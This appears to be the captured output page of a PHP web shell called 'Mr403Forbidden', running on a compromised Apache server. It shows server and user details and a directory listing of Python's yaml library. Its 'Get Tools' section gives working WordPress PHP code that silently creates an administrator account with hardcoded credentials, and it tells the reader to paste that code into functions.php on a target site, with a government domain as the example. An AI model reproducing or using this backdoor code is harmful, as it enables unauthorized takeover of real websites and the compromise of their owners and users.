./Mr403Forbidden

:/usr/lib64/python3.6/site-packages/yaml/ [ drwxr-xr-x ]

System: Linux 94.45.167.72.host.secureserver.net 4.18.0-553.120.1.el8_10.x86_64 #1 SMP Mon Apr 20 18:04:27 EDT 2026 x86_64
Software: Apache
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 172.67.145.68
Your IP: 216.73.216.150
User: godevadmin (1035) | Group: godevadmin (1013)
Safe Mode: OFF
MYSQL: OFF | PERL: OFF | PYTHON: OFF | WGET: OFF | CURL: ON | GCC: OFF | PKEXEC: OFF
Disable Function:
exec,passthru,shell_exec,system

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = '[email protected]';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
__pycache__ dir 2024-08-07 14:37 - root/root drwxr-xr-x
__init__.py file 2016-08-28 23:56 9.38 KB root/root -rw-r--r--
composer.py file 2016-08-28 23:56 4.77 KB root/root -rw-r--r--
constructor.py file 2016-08-28 23:56 24.96 KB root/root -rw-r--r--
cyaml.py file 2016-08-28 23:56 3.22 KB root/root -rw-r--r--
dumper.py file 2016-08-28 23:56 2.66 KB root/root -rw-r--r--
emitter.py file 2016-08-28 23:56 41.95 KB root/root -rw-r--r--
error.py file 2016-08-28 23:56 2.47 KB root/root -rw-r--r--
events.py file 2016-08-28 23:56 2.39 KB root/root -rw-r--r--
loader.py file 2016-08-28 23:56 1.11 KB root/root -rw-r--r--
nodes.py file 2016-08-28 23:56 1.41 KB root/root -rw-r--r--
parser.py file 2016-08-28 23:56 24.9 KB root/root -rw-r--r--
reader.py file 2016-08-28 23:56 6.69 KB root/root -rw-r--r--
representer.py file 2016-08-28 23:56 13.77 KB root/root -rw-r--r--
resolver.py file 2016-08-28 23:56 8.76 KB root/root -rw-r--r--
scanner.py file 2016-08-28 23:56 50.48 KB root/root -rw-r--r--
serializer.py file 2016-08-28 23:56 4.07 KB root/root -rw-r--r--
tokens.py file 2016-08-28 23:56 2.51 KB root/root -rw-r--r--

© ./Mr403Forbidden